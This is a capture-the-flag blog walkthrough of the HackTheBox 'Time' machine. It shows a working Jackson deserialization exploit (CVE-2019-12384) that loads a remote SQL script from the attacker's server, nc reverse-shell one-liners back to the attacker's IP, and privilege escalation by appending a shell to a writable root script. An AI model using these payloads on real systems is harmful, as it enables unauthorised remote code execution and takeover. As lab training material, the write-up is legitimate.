Time HackTheBox WalkThrough

Time HackTheBox WalkThrough

This is Time HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Time HTB machine. Before starting let us know something about this machine. It is a Linux box with IP address 10.10.10.214 and difficulty medium assigned by its maker.

First of all connect your PC with VPN and make sure your connectivity with Time machine by pinging its IP 10.10.10.214. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. I have used nmap for scanning and the result is given below:-

Scanning

$nmap -sC -sV -oN time.nmap 10.10.10.214

Performing nmap scan during Time HackTheBox WalkThrough

Nmap revealed that port 22 and 80 are open. OpenSSH on port 22 and Apache2 web server on port 80 are running. Since apache2 is running on port 80 so there must be some website hosted on this server which can be accessed at URL http://10.10.10.214:80 or simply http://10.10.10.214 . Ongoing to this URL found that this website is for Beautifying & Validating JSON (JavaScript Object Notation).

JSON beautifier web page running on port 80 of time hackthebox

Tried to validate and beautify some fake JSONs from internet and it worked fine. But when I tried to inject some payload of XSS (just for testing) it gave validation error. Validation error exposes that this website is using Jackson library for JSON deserialization (deserialization  is basically converting JSON code back to object to store them on disk).

Soon I got information about Jackson Library immediately I googled for Jackson library vulnerability and got this link  and then this CVE-2019-12384 on very first page. According to this article the application that uses Jackson library for JSON deserialization were affected with deserialization vulnerability where an attacker could control the class that is to be deserialized. You should read above blog to know how this vulnerability actually work and the way to reproduce them. Another PoC of this vulnerability can be found at GitHub.

Getting User Shell

After finding the steps on GitHub, I did the following things to exploit this vulnerability.

1. Created a file named inject.sql and put the following content into it.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command = {"bash", "-c", cmd};java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");return s.hasNext() ? s.next() : ""; }$$;CALL SHELLEXEC('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f')

$cat inject.sql

Inject.sql code snippet taken from from the GitHub page of exploit

You should replace the IP address in SHELLEXEC() function at last line of above code.

2. Started python httpserver to host this file.

3. Started netcat listener to listen on port 1234 in another window.

4. Entered the following code in the input field of the website after choosing the option Validate(beta) and then clicked on PROCESS button.

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/10.10.14.10:80\/inject.sql'"}]

The above code is in its beautified form you can also use it’s raw form for getting reverse shell.

Start Python HttpServer

$ sudo python3 -m http.server 80

Start Netcat Listener

$ nc -nvlp 1234

$ whoami && id

Getting User Shell in Time HackTheBox WalkThrough

We got a user shell. Let us upgrade it to fully qualified Linux shell so that we can execute more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

$ CTRL+Z //To background the shell

$ stty raw -echo

$ fg //To foreground the shell and press two times enter

Upgrading shell to fully qualified Linux shell

Capture User Flag

$cat /home/pericles/user.txt

User flag captured during Time HackTheBox WalkThrough

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege. For this I ran linpeas.sh (a post exploitation enumeration script) on time machine. It gives us information of all potential vectors that can be used to escalate privilege to root.

Finding PrivEsc Vector

Linpeas found a script timer_backup.sh inside the directory /usr/bin/ which is writeable by normal users.

Finding privilege escalation vector using Linpeas.sh in time htb

Confirmed it by checking its permission and to remove false positive.

$ ls -la /usr/bin/timer_backup.sh

Checking file permission of file timer_backup.sh file in time hackthebox machine

Its permission is rwx (readable, writeable and executable) for user pericles. But when I tried to execute this script it gave me permission denied. One thing is clear that this script can only be executed by root user. So, if root user can execute this script it means all the content inside this file is executed by root privilege. So if we introduce our reverse shell payload inside this file then it will also get executed by root privilege and we can get root shell. I did the same and easily got root shell. So here our PrivEsc vector is Privilege Escalation due to exploitation of Unwanted File Permission given to normal user.

Getting Root Shell

To get root shell I did the following things:-

1. Started netcat listener in one window.

2. Written our reverse shell payload in the file timer_backup.sh (since normal user can modify this file).

This script is executed by root at regular interval (I think at interval of 5-10 sec, exactly don’t know just guessing but in my case it took about 5-10 sec gap). Now when it execute next time it will also execute our reverse shell code and we will get root shell.

On Kali Machine

$nc -nvlp 4321

On Time Machine

$echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 4321 >/tmp/f' >>/usr/bin/timer_backup.sh

Privilege escalation in Time HackTheBox WalkThrough

We are root now. Let’s capture root flag.

Capture Root Flag

$cat /root/root.txt

Root flag captured during Time HackTheBox WalkThrough

This was how I rooted to the Time HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out our latest walkthroughs at https://ethicalhacs.com/ .

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/